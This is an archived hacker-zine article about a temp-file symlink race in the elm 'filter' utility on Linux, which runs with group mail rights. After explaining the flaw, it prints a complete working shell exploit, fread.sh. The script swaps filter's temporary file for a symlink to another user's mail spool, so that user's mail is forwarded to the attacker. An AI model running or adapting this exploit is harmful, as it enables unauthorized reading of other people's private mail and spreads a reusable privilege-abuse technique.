TUCoPS :: Linux :: General :: linux_fi.txt

Filter Security Holes
 



                    Linux 'filter' Security Holes
                             by FEH Staff

   The elm filter under linux runs sugrp mail, thus allowing it to freely
read and write from users mail spools.  It is only through the integrity
of its code that the security of linux's mail system is protected; and in
this respect it falls short.  In FEH #2, we printed mail-clobber, code
that exploited filter in order to destroy a user's mail spool.  But, the
capabilities to exploit filter extend beyond destruction of a mail spool,
you can also use it to read a mail spool.
   The specific problem that is exploited in this hole is the way filter
uses a temporary file to store the input to it, and then subsequently send
it back out according to the filter.  Because of the modularity of the
coding, in the main filter.c, the temporary file is opened, and then written
to; after which it is closed.  The mailmessage function is then called, with
the purpose of forwarding that mail, written to the temporary file, to
whatever destination is specified in the filter.  At the start of this
process, the temporary file is opened, and the contents of it are dumped
to the mail spool of the user the mail is being forwarded to.
   At any point after the file has been initially opened by the main filter
function, since the user running filter has permissions on that temp file,
it can be rm'd.  The temp file existing can then be replaced with a symbolic
link to any file that group mail has read permissions on.  When it is opened
in the mailmessage function, the symbolic link is followed and whatever file
that was pointed to will be read in, and the contents forwarded to the user
specified in the mail spool.
   The complete exploit is shown below:

                   Program: filter, an elm utility
Affected Operating Systems: linux
              Requirements: account on machine
       Security Compromise: user can read any mail spool readable by grp mail.
                            (usually everything, sometimes not root)
                  Synopsis: filter writes out the mail to be forwarded to a
                            temporary file, which is then closed and reopened;
                            if when the temporary file is reopened it is a
                            symlink to a mail spool, filter will proceed
                            to forward the contents of that file as if it was
                            the original message.

fread.sh:
#!/bin/sh
echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp
echo From: ReDragon > /tmp/fread-msg.tmp
echo To: $LOGNAME >> /tmp/fread-msg.tmp
echo Subject: Filter Exploit >> /tmp/fread-msg.tmp
echo sleep 2 > /tmp/fread-sh.tmp
echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp
chmod +x /tmp/fread-sh.tmp
/tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &
FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`
rm -f /tmp/filter.$FREAD
ln -s /var/spool/mail/$1 /tmp/filter.$FREAD
sleep 2
rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp /tmp/fread-ftr.tm
p /tmp/filter.$FREAD
FREAD=

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH